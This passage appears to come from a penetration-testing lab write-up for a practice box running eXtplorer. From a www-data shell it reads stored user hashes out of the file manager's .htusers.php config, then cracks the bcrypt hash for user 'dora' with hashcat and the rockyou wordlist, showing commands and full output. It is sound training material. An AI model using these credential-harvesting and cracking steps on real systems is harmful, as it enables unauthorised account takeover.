Configuration Files
Checking for credentials in configuration files after performing a manual system enumeration
Since the WordPress instance hasn’t even been setup, there is nothing there.
www-data@dora:/var/www/html/filemanager/config$ ll
total 36K
4.0K -rw-r--r-- 1 www-data www-data 413 Apr 6 2023 .htusers.php
4.0K drwxr-xr-x 2 www-data www-data 4.0K Apr 6 2023 .
4.0K -rw-rw-r-- 1 www-data www-data 99 Apr 6 2023 bookmarks_extplorer_admin.php
4.0K drwxr-xr-x 11 www-data www-data 4.0K Apr 6 2023 ..
4.0K -rw-r--r-- 1 www-data www-data 3.0K Jan 6 2022 conf.php
8.0K -rw-r--r-- 1 www-data www-data 7.7K Jan 6 2022 mimes.php
4.0K -rw-r--r-- 1 www-data www-data 15 Feb 23 2016 .htaccess
4.0K -rw-r--r-- 1 www-data www-data 44 Feb 23 2016 index.html.htusers.php
www-data@dora:/var/www/html/filemanager/config$ cat .htusers.php
<?php
// ensure this file is being included by a parent file
if( !defined( '_JEXEC' ) && !defined( '_VALID_MOS' ) ) die( 'Restricted access' );
$GLOBALS["users"]=array(
array('admin','21232f297a57a5a743894a0e4a801fc3','/var/www/html','http://localhost','1','','7',1),
array('dora','$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS','/var/www/html','http://localhost','1','','0',1),
); That appears to be the credential hash for the dora user
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ hashcat --show dora.hash
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/extplorer]
└─$ hashcat -a 0 -m 3200 dora.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS:doraemon
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/C...T7CjjS
Time.Started.....: Wed Mar 26 11:24:13 2025 (2 secs)
Time.Estimated...: Wed Mar 26 11:24:15 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 894 H/s (4.77ms) @ Accel:12 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1584/14344385 (0.01%)
Rejected.........: 0/1584 (0.00%)
Restore.Point....: 1440/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:248-256
Candidate.Engine.: Device Generator
Candidates.#1....: rachelle -> danilo
Hardware.Mon.#1..: Util: 88%
Started: Wed Mar 26 11:24:09 2025
Stopped: Wed Mar 26 11:24:16 2025Password hash cracked for the dora user; doraemon
Validating